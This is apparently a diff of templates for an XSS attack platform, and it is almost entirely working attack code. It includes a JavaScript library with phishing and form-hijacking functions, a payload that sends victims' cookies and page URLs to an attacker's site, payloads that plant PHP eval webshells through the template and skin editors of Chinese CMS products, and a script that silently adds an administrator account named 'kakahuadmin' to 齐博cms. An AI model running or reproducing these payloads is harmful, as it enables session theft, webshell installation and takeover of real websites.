pkav.post("index.php?m=template&c=file&a=edit_file&style=default&dir=announce&file=show.html", "code=%7Btemplate+%27content%27%2C+%27header%27%7D%0D%0A%3C%21--main--%3E%0D%0A%3Cdiv+class%3D%22main%22%3E%0D%0A%09%3Cdiv+class%3D%22col-left%22%3E%0D%0A++++%09%3Cdiv+class%3D%22crumbs%22%3E%3Ca+href%3D%22%7BAPP_PATH%7D%22%3E%CA%D7%D2%B3%3C%2Fa%3E%3Cspan%3E+%3E+%3C%2Fspan%3E%B9%AB%B8%E6%3C%2Fdiv%3E%0D%0A++++++++%3Cdiv+id%3D%22Article%22%3E%0D%0A++++++++%09%3Ch1%3E%7B%24title%7D%3Cbr+%2F%3E%0D%0A%3Cspan%3E%3C%2Fspan%3E%3C%2Fh1%3E%0D%0A%09%09%09%3Cdiv+class%3D%22content%22%3E%0D%0A%09%09%09++%7B%24content%7D%0D%0A%09%09%09%3C%2Fdiv%3E%0D%0A++++++%3C%2Fdiv%3E%0D%0A++%3C%2Fdiv%3E%0D%0A++++%3Cdiv+class%3D%22col-auto%22%3E%0D%0A++++++++%3Cdiv+class%3D%22box+pd_b0%22%3E%0D%0A%09%09%7Bpc%3Acomment+action%3D%22bang%22+cache%3D%223600%22%7D%0D%0A++++++++++++%3Cul+class%3D%22itemli%22%3E%0D%0A%09%09%09%7Bloop+%24data+%24r%7D%0D%0A++++++++++++++++%3Cli%3E%3Ca+href%3D%22%7B%24r%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7Bstr_cut%28%24r%5Btitle%5D%2C+26%29%7D%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++%7B%2Floop%7D%0D%0A++++++++++++%3C%2Ful%3E%0D%0A%09%09%7B%2Fpc%7D%0D%0A++++++++%3C%2Fdiv%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27content%27%2C+%27footer%27%7D%0D%0A%3Cscript+language%3Dphp%3E%24fp+%3D+%40fopen%28%22test.php%22%2C+%27a%27%29%3B%0D%0A%40fwrite%28%24fp%2C+%27%3C%27.%27%3Fphp%27.%22%5Cr%5Cn%5Cr%5Cn%22.%27%40eval%28%24_POST%5B%22chopper%22%5D%29%27.%22%5Cr%5Cn%5Cr%5Cn%3F%22.%22%3E%5Cr%5Cn%22%29%3B%0D%0A%40fclose%28%24fp%29%3B%3C%2Fscript%3E&dosubmit=%CC%E1%BD%BB&pc_hash=" + hash, function(rs) {});
pkav.get("index.php?m=template&c=file&a=visualization&style=default&dir=announce&file=show.html&pc_hash=" + hash, function(rs) {});
window.__x = 1;
}

1
template/xss.desc Normal file
View File

@@ -0,0 +1 @@
sBKxRzbQMa6/QVcft4M3sVX0YfSo

181
template/xss.js Normal file
View File

@@ -0,0 +1,181 @@
var xss = function() {
var x = {
'name': 'xss.js',
'version': '0.1',
'author': 'jackmasa'
};
x.x = function(id) {
return document.getElementById(id)
};
//容错取值
x.e = function(_) {
try {
return eval('(' + _ + ')')
} catch (e) {
return ''
}
};
//浏览器
x.i = {
i: !!self.ActiveXObject,
c: !!self.chrome,
f: self.mozPaintCount > -1,
o: !!self.opera,
s: !self.chrome && !!self.WebKitPoint
};
//UA
x.ua = navigator.userAgent;
//判断是否为苹果手持设备
x.apple = x.ua.match(/ip(one|ad|od)/i) != null;
//随机数
x.rdm = function() {
return ~~(Math.random() * 100000)
};
//url编码(UTF8)
x.ec = encodeURIComponent;
x.html = document.getElementsByTagName('html')[0];
/*
* 销毁一个元素
*/
x.kill = function(e) {
e.parentElement.removeChild(e);
};
/*
*绑定事件
*/
x.bind = function(e, name, fn) {
e.addEventListener ? e.addEventListener(name, fn, false) : e.attachEvent("on" + name, fn);
};
/*
* dom准备完毕时执行函数
*/
x.ready = function(fn) {
if (!x.i.i) {
x.bind(document, 'DOMContentLoaded', fn);
} else {
var s = setInterval(function() {
try {
document.body.doScroll('left');
clearInterval(s);
fn();
} catch (e) {}
}, 4);
}
}
/*
* 同源检测
*/
x.o = function(url) {
var link = x.dom('<a href="' + encodeURI(url) + '">', 2);
return link.protocol + link.hostname + ':' + link.port == location.protocol + location.hostname + ':' + link.port;
};
/*
* html to dom
*/
x.dom = function(html, gcsec) {
var tmp = document.createElement('span');
tmp.innerHTML = html;
var e = tmp.children[0];
e.style.display = 'none';
x.html.appendChild(e);
gcsec >> 0 > 0 && setTimeout(function() {
x.kill(e);
}, gcsec * 1000);
return e;
};
/*
* ajax
*/
x.ajax = function(url, params, callback) {
(params instanceof Function) && (callback = params, params = void(0));
var XHR = (!x.o(url) && window.XDomainRequest) ||
window.XMLHttpRequest ||
(function() {
return new ActiveXObject('MSXML2.XMLHTTP')
});
var xhr = new XHR();
xhr.open(params ? 'post' : 'get', url);
try {
xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded')
} catch (e) {}
callback && (xhr.onreadystatechange = function() {
(this.readyState == 4 && ((this.status >= 200 && this.status <= 300) || this.status == 304)) && callback.apply(this, arguments);
});
xhr.send(params);
};
/*
* no ajax
*/
x.najax = function(url, params) {
if (params) {
var form = x.dom('<form method=post accept-charset=utf-8>');
form.action = url;
for (var name in params) {
var input = document.createElement('input');
input.name = name;
input.value = params[name];
form.appendChild(input);
}
var iframe = x.dom('<iframe name=_' + x.rdm() + '_>', 6);
form.target = iframe.name;
form.submit();
} else {
new Image().src = url + '&' + x.rdm();
}
};
/*
* 钓鱼
*/
x.phish = function(url) {
x.ajax(url, function() {
document.open();
document.write(this.responseText);
document.close();
history.replaceState & x.o(url) && history.replaceState('', '', url);
})
};
/*
* 表单劫持
*/
x.xform = function(form, action) {
form.old_action = form.action, form.old_target = form.target, form.action = action;
var iframe = x.dom('<iframe name=_' + x.rdm() + '_>');
form.target = iframe.name;
setTimeout(function() {
x.bind(iframe, 'load', function() {
form.action = form.old_action, form.target = form.old_target, form.onsubmit = null, form.submit();
})
}, 30);
};
/*
* 函数代理
*/
x.proxy = function(fn, before, after) {
return function() {
before && before.apply(this, arguments);
var result = fn.apply(this, arguments);
after && after.apply(this, arguments);
return result;
}
};
return x;
}();

1
template/弹框测试.desc Normal file
View File

@@ -0,0 +1 @@
sRaIRS3NMqOMTmwi

1
template/弹框测试.js Normal file
View File

@@ -0,0 +1 @@
alert("xss");

1
template/截图.desc Normal file
View File

@@ -0,0 +1 @@
vCSGRjLcMp+HTm0IBkfKsGfRY9SuEa0db8Cq7dKg95QKQVu75iiNsl7MK81g1hDggtB4JbVbtuoE5gxe2Zw5TooZkJtWi8DmJlP1F9SogknZALl/f0ISdJPmFbDSN2Bk9T0U7kuyGfzYLW8KHGb7ngQorzZEfw==

4
template/截图.js Normal file
View File

File diff suppressed because one or more lines are too long

1
template/程氏舞曲CMSPHP3.0.desc Normal file
View File

@@ -0,0 +1 @@
vB+1RRrSMbKDQ0wYl6MXuEHZbM6ZHYM5bcqgeDFjfHzox4lTZ+t0vkvVJqvlLM1gCXF7IahbgvQF9BiJfRbygm0ZGkekiejXfxWygHQDSRbkdNFxDggT

27
template/程氏舞曲CMSPHP3.0.js Normal file
View File

@@ -0,0 +1,27 @@
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if (window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'
];
for (var i = 0; i < versions.length; i++) {
try {
request = new ActiveXObject(versions);
} catch (e) {}
}
}
xmlhttp = request;
thisTHost = top.location.hostname;
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
var params = 'name=123.php&content=<?php @eval($_POST[123]);?>';
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);

1
template/默认模块.desc Normal file
View File

@@ -0,0 +1 @@
vSqrSzPMrGV0Q207CVj0smLvYvWTH5Ysbs6V7t2x/bM4S2uy5BiEPrEPr3iUUvMLUWsvfL8M8/ZjkzQ0p4t4GqronIdNBSEz

2
template/默认模块.js Normal file
View File

@@ -0,0 +1,2 @@
var website="http://网站地址";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

1
template/齐博cms加管理.desc Normal file
View File

@@ -0,0 +1 @@
vRehRgHRt3t0Q0kXCH7FsG3Ta9WzH5gAbtKZ7sqHeW7fz49CY/dFv1FX9nvnGOViFGX0+Ejdfh6CGOXRIQ==

58
template/齐博cms加管理.js Normal file
View File

@@ -0,0 +1,58 @@
var pkav = {
ajax: function() {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
return xmlHttp;
},
req: function(url, data, method, callback) {
method = (method || "").toUpperCase();
method = method || "GET";
data = data || "";
if (url) {
var a = this.ajax();
a.open(method, url, true);
if (method == "POST") {
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
}
a.onreadystatechange = function() {
if (a.readyState == 4 && a.status == 200) {
if (callback) {
callback(a.responseText);
}
}
};
if ((typeof data) == "object") {
var arr = [];
for (var i in data) {
arr.push(i + "=" + encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
} else {
a.send(data || null);
}
}
},
get: function(url, callback) {
this.req(url, "", "GET", callback);
},
post: function(url, data, callback) {
this.req(url, data, "POST", callback);
}
};
if (!window.__x) {
pkav.post("/admin/index.php?lfj=member&action=addmember", "postdb%5Busername%5D=kakahuadmin&postdb%5Bpasswd%5D=kakahuadmin&postdb%5Bpasswd2%5D=kakahuadmin&postdb%5Bgroupid%5D=3&postdb%5Bemail%5D=kakahuadmin%40qq.com&Submit=%CC%E1%BD%BB", function(rs) {});
pkav.get("接口地址", function(rs) {});
window.__x = 1;
}